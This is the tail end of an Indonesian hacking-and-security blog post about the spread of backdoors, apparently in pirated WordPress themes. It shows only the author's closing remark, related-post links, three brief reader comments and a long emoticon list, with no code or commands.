Oke cukup sekian tutorial singkat dari saya, semoga berguna dan selalu waspada karena di internet gak semua orang bisa dipercaya Stop

Related posts:

  1. Apa dan Bagaimana XSS itu? live (http://sctv.co.id)
  2. Simple PHP Mailer + Reload Every (FF) = Email Bomber
Posted in : Hacking, PHP, Security
Tags : , , , ,

3 Responses to “Penyebaran Backdoor Makin Beragam”

Themes Wordpress Terenkripsi? | Cruz3N Blog

December 27th, 2010 at 6:10 pm

[...] Wew, apalagi itu? Ternyata itu adalah salah satu proteksi yang “mungkin” dilakukan oleh si pembuat themes agar footernya gak bisa diedit-diedit atau perbuatan orang iseng? (Itu kalo kalian download themes “bajakan”, mungkin kalian bisa baca-baca artikel saya tentang “Penyebaran Backdoor Makin Beragam”) [...]

Keren

December 30th, 2010 at 7:41 am

Makasih kakak buat penjelasannya… Yes

Cruz3N

December 30th, 2010 at 9:44 am

@Keren: Semoga berguna Bro Yes

Leave a Response

SmileBig SmileGrinLaughFrownBig FrownCryNeutralWinkKissRazzChicCoolAngryReally AngryConfusedQuestionThinkingPainShockYesNoLOLSillyBeautyLashesCuteShyBlushKissedIn LoveDroolGiggleSnickerHeh!SmirkWiltWeepIDKStruggleSide FrownDazedHypnotizedSweatEek!Roll EyesSarcasmDisdainSmugMoney MouthFoot in MouthShut MouthQuietShameBeat UpMeanEvil GrinGrit TeethShoutPissed OffReally PissedMad RazzDrunken RazzSickYawnSleepyDanceClapJumpHandshakeHigh FiveHug LeftHug RightKiss BlowKissingByeGo AwayCall MeOn the PhoneSecretMeetingWavingStopTime OutTalk to the HandLoserLyingDOH!Fingers CrossedWaitingSuspenseTremblePrayWorshipStarvingEatVictoryCurseAlienAngelClownCowboyCyclopsDevilDoctorFemale FighterMale FighterMohawkMusicNerdPartyPirateSkywalkerSnowmanSoldierVampireZombie KillerGhostSkeletonBunnyCatCat 2ChickChickenChicken 2CowCow 2DogDog 2DuckGoatHippoKoalaLionMonkeyMonkey 2MousePandaPigPig 2SheepSheep 2ReindeerSnailTigerTurtleBeerDrinkLiquorCoffeeCakePizzaWatermelonBowlPlateCanFemaleMaleHeartBroken HeartRoseDead RosePeaceYin YangUS FlagMoonStarSunCloudyRainThunderUmbrellaRainbowMusic NoteAirplaneCarIslandAnnouncebrbMailCellPhoneCameraFilmTVClockLampSearchCoinsComputerConsolePresentSoccerCloverPumpkinBombHammerKnifeHandcuffsPillPoopCigarette